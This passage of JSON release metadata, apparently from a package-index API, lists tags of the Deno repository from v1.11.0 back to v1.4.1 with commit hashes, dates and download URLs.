/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6